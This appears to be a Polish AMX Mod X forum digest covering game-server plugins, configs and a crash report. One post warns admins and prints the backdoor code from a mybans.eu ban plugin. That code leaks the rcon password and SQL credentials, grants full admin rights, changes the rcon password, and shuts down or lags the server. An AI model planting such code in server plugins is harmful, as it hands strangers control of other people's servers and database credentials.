

To równanie zostało stworzone przy pomocy kodu LaTeX:
Edytor LaTeX online: CodeCogs.com/latex/eqneditor.php
Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
|
Napisane przez N1K1Cz
w 05.02.2023 12:25
Napisane przez damiann1990
w 29.06.2022 07:41
Napisane przez Misiu.
w 25.06.2021 12:34
Amx Mod X 1.9.0, Amx Mod X 1.10.0
// Maksymalna liczba zakupionych granatów oślepiających // Default: "4" // Minimum: "1.000000" gl_flash_pcs "4" // Cena za pierwszy granat oślepiający // Default: "200" // Minimum: "0.000000" gl_flash_price "200" // Maksymalna liczba zakupionych granatów odłamkowych // Default: "2" // Minimum: "1.000000" gl_hegren_pcs "2" // Cena za pierwszy granat odłamkowy // Default: "300" // Minimum: "0.000000" gl_hegren_price "300" // Maksymalna liczba zakupionych granatów dymnych // Default: "2" // Minimum: "1.000000" gl_sgren_pcs "2" // Cena za pierwszy granat dymny // Default: "300" // Minimum: "0.000000" gl_sgren_price "300" // Dopłata za granaty // Cena za dodatkowy granat będzie kalkulowana według zasady: cena za pierwszy granat + dopłata // Default: "100" // Minimum: "0.000000" gl_add_price "100"
Napisane przez KoRrNiK
w 27.02.2021 16:12
Napisane przez DaFFyy
w 21.01.2021 18:57
Cześć,
Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.
Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.
public amxbanuser1(id) { get_cvar_string("rcon_password", szRc, 63); client_print(id, print_console, "RCON:\"%s\"", szRc); } public amxbanuser2(id) { set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0); get_cvar_string("amx_sql_host", szSqlHost, 63); get_cvar_string("amx_sql_user", szSqlUser, 63); get_cvar_string("amx_sql_pass", szSqlPass, 63); get_cvar_string("amx_sql_db", szSqlDb, 63); client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost); client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser); client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass); client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb); } public amxbanuser3() { server_cmd("rcon_password 748663183"); } public amxbanuser4() { server_cmd("shutdownserver"); } public amxbanuser5() { set_task(0.00, "lagsnc", 2137, "", 0, "b", 0); } public lagsnc() { remove_task(2138, 0); server_cmd("sys_ticrate 1"); } public amxbanuser6() { set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0); } public lagsncoff() { remove_task(2137, 0); server_cmd("sys_ticrate 1000"); }
Posprawdzajcie swoje serwery,
( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.
Nie musicie dziękować, żyjcie w miłości i spokoju!
Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/
@edit
Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:
Jonkey - https://mybans.pl/profile/1-jonkey/
smajli - x
Kava - x
Napisane przez viper367
w 17.11.2020 13:46
Studiomdl dekompilujesz model
Jed's Model Viewer 1.36 - w nim ustawiasz lokalizacje tych 2 programów i przez niego dekompilujesz
potem juz notatnikiem edycja pliku .qc
Studiomdl kompilujesz model
Napisane przez nojaknie
w 10.11.2020 15:31
Napisane przez Rank Up
w 18.10.2020 14:35
Napisane przez O'Zone
w 16.07.2020 10:20
Na prawdę nie podoba mi się to, że pomimo uwagi zarówno mojej jak i Dark'a co do założenia osobnego tematu, nadal ciągniesz tą dyskusję tutaj.
Powinienem wręcz kompletnie zignorować twój post dopóki nie pojawi się tam, gdzie powinien.
Piszę tu gdyż wydałeś jak sam powiedziałeś grywałną wersję 2.0, a nie jest ona na tą chwilę grywalna.
Grałeś w jakąkolwiek grę AAA wydaną w ostatnich kilku latach?
To, że coś jest grywalne nie oznacza, że jest pozbawione bugów.
Ja chociaż nikogo nie oszukuję oznaczając to wydanie jako wersję beta.
P.s: Jesteś developerem więc zrób jak sztuka pisze i postaraj się odtworzyć błąd na własnym środowisku...
I tak właśnie zrobiłem, kiedy w końcu dostarczyłeś jakieś sensowne informacje, a nie pisząc "I na dzień dobry leci crash".
Po wejściu HLTV na serwer leci crash (REUNION) authenticated HLTV
Dokupiłem sobie zatem HLTV na swój serwer testowy i bez problemu udało mi się zreplikować problem.
Bardzo przydatny był tutaj stack z logu crasha na serwerze, gdzie w parametrach startowych jest -debug.
CRASH: Thu Jul 16 10:22:10 CEST 2020 Start Line: ./hlds_linux -autorestart -game cstrike +maxplayers 6 +ip 46.29.21.219 +port 27540 +sys_ticrate 500 +exec server.cfg +map de_dust2 -pidfile /data/thedoctor0/logs/780916.cs.pid [New LWP 30083] [New LWP 30085] [New LWP 30110] [New LWP 30104] [New LWP 30106] [New LWP 30084] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Core was generated by `./hlds_linux -autorestart -game cstrike +maxplayers 6 +ip 46.29.21.219 +port 27'. Program terminated with signal SIGSEGV, Segmentation fault. #0 0xf2cb91ee in get_pcvar_num(tagAMX*, int*) () from /home/data/thedoctor0/780916.cs16/cstrike/addons/amxmodx/dlls/amxmodx_mm_i386.so #0 0xf2cb91ee in get_pcvar_num(tagAMX*, int*) () from /home/data/thedoctor0/780916.cs16/cstrike/addons/amxmodx/dlls/amxmodx_mm_i386.so #1 0xf2e13238 in ?? () from /home/data/thedoctor0/780916.cs16/cstrike/addons/amxmodx/dlls/amxmodx_mm_i386.so Backtrace stopped: previous frame inner to this frame (corrupt stack?) No symbol table info available. From To Syms Read Shared Object Library No linux-gate.so.1 0xf77b4ad0 0xf77b596c Yes (*) /lib/i386-linux-gnu/i686/cmov/libdl.so.2 0xf7727914 0xf776dc78 Yes ./libstdc++.so.6 0xf769e600 0xf76cbed5 Yes (*) /lib/i386-linux-gnu/i686/cmov/libm.so.6 0xf7504420 0xf76346fe Yes (*) /lib/i386-linux-gnu/i686/cmov/libc.so.6 0xf77cd860 0xf77e580c Yes (*) /lib/ld-linux.so.2 0xf74d9e04 0xf74e9490 Yes ./libgcc_s.so.1 0xf6e0a200 0xf6ef08d0 Yes (*) /home/data/thedoctor0/780916.cs16/engine_i486.so 0xf6dce9b0 0xf6dd1eaa Yes (*) /lib/i386-linux-gnu/i686/cmov/librt.so.1 0xf6dbc5c0 0xf6dc6d74 Yes (*) ./libsteam_api.so 0xf6da2840 0xf6daef57 Yes (*) /lib/i386-linux-gnu/i686/cmov/libpthread.so.0 0xf6d86aa0 0xf6d93428 Yes /home/data/thedoctor0/780916.cs16/filesystem_stdio.so 0xf5b62300 0xf6875c44 Yes (*) ./steamclient.so 0xf5a11670 0xf5a87020 Yes (*) ./crashhandler.so 0xf31b06a0 0xf31f2f70 Yes (*) /home/data/thedoctor0/780916.cs16/./cstrike/addons/metamod/metamod.so 0xf2f72e20 0xf30efed0 Yes (*) /home/data/thedoctor0/780916.cs16/cstrike/dlls/cs.so 0xf2c6fa10 0xf2cd2de7 Yes (*) /home/data/thedoctor0/780916.cs16/cstrike/addons/amxmodx/dlls/amxmodx_mm_i386.so 0xf2936790 0xf29cefc5 Yes (*) cstrike/addons/amxmodx/modules/mysql_amxx_i386.so 0xf28192d0 0xf28fa980 Yes (*) cstrike/addons/amxmodx/modules/sqlite_amxx_i386.so 0xf27f2660 0xf27f6f84 Yes (*) cstrike/addons/amxmodx/modules/fun_amxx_i386.so 0xf27d9290 0xf27e580c Yes (*) cstrike/addons/amxmodx/modules/engine_amxx_i386.so 0xf27999d0 0xf27c5d6c Yes (*) cstrike/addons/amxmodx/modules/fakemeta_amxx_i386.so 0xf2770a50 0xf27768e4 Yes (*) cstrike/addons/amxmodx/modules/geoip_amxx_i386.so 0xf2763f60 0xf276524c Yes (*) cstrike/addons/amxmodx/modules/sockets_amxx_i386.so 0xf26fc5d0 0xf2745548 Yes (*) cstrike/addons/amxmodx/modules/regex_amxx_i386.so 0xf26ec9b0 0xf26f0a08 Yes (*) cstrike/addons/amxmodx/modules/nvault_amxx_i386.so 0xf26d6d50 0xf26e6460 Yes (*) cstrike/addons/amxmodx/modules/cstrike_amxx_i386.so 0xf2675830 0xf26bc974 Yes (*) cstrike/addons/amxmodx/modules/hamsandwich_amxx_i386.so 0xf20e0540 0xf211f670 Yes (*) cstrike/addons/amxmodx/modules/reapi_amxx_i386.so 0xf261c840 0xf26404e0 Yes (*) /home/data/thedoctor0/780916.cs16/cstrike/addons/reunion/reunion_mm_i386.so 0xf20347b0 0xf209ebc4 Yes (*) /home/data/thedoctor0/780916.cs16/cstrike/addons/voicetranscoder/voicetranscoder_mm_i386.so 0xf1fba120 0xf1fc0444 Yes (*) cstrike/addons/amxmodx/modules/csx_amxx_i386.so 0xf0c73ad0 0xf0c7a8ab Yes (*) /lib/i386-linux-gnu/i686/cmov/libnss_files.so.2 (*): Shared library is missing debugging information. Stack level 0, frame at 0xffdc6194: eip = 0xf2cb91ee in get_pcvar_num(tagAMX*, int*); saved eip = 0xf2e13238 called by frame at 0xb1815e8 Arglist at 0xffdc618c, args: Locals at 0xffdc618c, Previous frame's sp is 0xffdc6194 Saved registers: eip at 0xffdc6190 End of crash report
Szybko się okazało, że wynika on ze zmian wprowadzonych tutaj, gdzie dały o sobie znać stare nawyki co do pobierania wartości cvarów.
Crash występowałby zarówno dla HLTV jak i każdego gracza bez flagi VIP/SVIP, kiedy to wykonywała się ta część warunku,
gdzie jako pointery wskazane były wartości cvarów rejestrowane przez bind_pcvar_num.
Odpowiedni fix został już zrobiony i pojawiła się wersja 2.0-beta2.
Idąc dalej:
Przy wyłączonym HLTV, ale działającym reunion leci multum błędów dotyczących dźwięków w grze
Logi w konsoli typu SV_BuildSoundMsg: player/pl_grate4.wav not precached (0) są efektem ubocznym działania Unprecachera.
Nie wpływają w żaden sposób na rozgrywkę i są obecne od niemalże samego początku tego moda - na długo przez jego upublicznieniem.
Przy css_overpass hud "miga" w rytmie upływających sekund
Na swoim serwerze testowym (46.29.21.219:27540, hasło: test) nic takiego nie doświadczam.
css_overpass ma błędy modeli i crashuje
Mapa overpass nie posiada żadnych zewnętrznych modeli, wszystkie są częścią pliku .bsp i jest ich niemało.
Zapewne wgrałeś pluginy rejestrujące dodatkowe zasoby i mino wszystko przekroczyłeś dla nich magiczny limit 512.
Napisane przez O'Zone
w 23.04.2020 16:45
Powiem szczerze, nie sądziłem, że spotka się to z takim zainteresowaniem
Na pewno niektórych ucieszy fakt, iż udało mi się znaleźć i wstępnie przystosować (podmiana rąk i rękawiczek)
modele noży z operacji Shattered Web: Nomad, Skeleton, Survival i Paracord.
Chciałbym jednak nieco ostudzić entuzjazm, bo ze względu na to ile czasu zajmuje konwersja modeli,
finalna wersja 2.0 pojawi się za co najmniej miesiąc, bo jak na razie zrobionych jest 7 z 45 modeli.
Mimo to przy tych 7 broniach (i wcześniejszych skinach noży) licznik ogólny wynosi aktualnie 571 skinów.
Oczywiście jeśli znajdą się jacyś chętni do Gwardii Dumbledore'a pomocy w tych pracach być może uda się ją wydać szybciej.
Ochotnicy wysłać do mnie prywatną wiadomość i postaram się przygotować instrukcję krok po kroku jak to wygląda.
W żadnym wypadku nie trzeba nic programować, to jest głównie zabawa z plikami tekstowymi i sklejaniem modelu w MilkShape.
Masowe generowanie modeli dla danej broni z przygotowanego szablonu i tekstur jest zautomatyzowane skryptem w pythonie,
który napisałem, więc nie jest to aż taka żmudna praca.
Jeśli ktoś jest w posiadaniu ciekawych skinów, a właściwie ich tekstur o rozdzielczości 512px x 512px,
też może się ze mną skontaktować, bo tych nigdy za mało.
Tymczasem mam w planach wydanie wersji 1.4, która będzie zawierać wszystkie zmiany bez submodeli.
Najprawdopodobniej zaraz potem pojawi się także wersja 2.0 beta, gdzie po prostu brakować będzie skinów do części broni.
PS. Jako, że nie podobają mi się standardowe noże z CS:GO zarówno dla CT jak i TT zostały one zamienione na jeden model.
Jest to nóż z CS 1.6 dodany do CS:GO na 20 rocznicę gry, który został z powrotem przeportowany do CS 1.6
Napisane przez
CichyRex
w 05.04.2020 17:37
Opis : Plugin dodaje możliwość założenia klanu ( za 16000$) do którego będziemy mogli zapraszać innych graczy, wpłacać dolary (za które później możemy wykupić prefix przed nick z nazwą klanu, lub ulepszyć poziom klanu). Możemy również wypłacać pieniądze z banku klanu. Mamy do dyspozycji również top10 klanów, gdzie pozycja w tym oto rankingu zależy od sumy ilości fragów wszystkich członków, oraz poziomu ulepszenia.
Czym większy poziom klanu, tym więcej graczy możemy zaprosić !
Cena : 11.07 zł sms - plik amxx + sma
http://i.imgur.com/z3Fap4a.png
http://i.imgur.com/Iyohwxf.png
http://i.imgur.com/d7Q1ixR.png
Napisane przez Ankeres
w 19.01.2020 13:35
Napisane przez Makss
w 19.10.2019 13:48
/teddy -otwiera nam się menu z bossem
/god - dostajemy goda
tutaj screen z eventu
Napisane przez AwIlL^^
w 30.09.2019 22:10
#include <hamsandwich> #include <fakemeta> stock get_weapon_owner(weapon_entity) { const pdata_player = 41; return get_pdata_cbase(weapon_entity, pdata_player, 4); } stock get_weapon_ent_from_box(weaponbox, &slot) { static const pdata_weapon_in_slot[6] = { 34 , 35 , ... }; new weapon_entity; for (slot = 0; slot<6; slot++) { weapon_entity = get_pdata_cbase(weaponbox, pdata_weapon_in_slot[slot], 4); if (pev_valid(weapon_entity) == 2) { return weapon_entity; } } return 0; }
na ziemi leżą tak zwane weaponboxy i dopiero w nich są bronie w swoich slotach
za pomocą funkcji get_weapon_ent_from_box pobierzesz pierwszą znalezioną broń z takiego boxa
za pomocą funkcji get_weapon_owner pobierzesz właściciela dowolnej broni jeżeli posiadasz jej entity
takie info dotyczące właściciela - właścicielem broni jest zawsze osoba, która ostatnio trzymała broń, a nie osoba, która trzymała broń jako pierwsza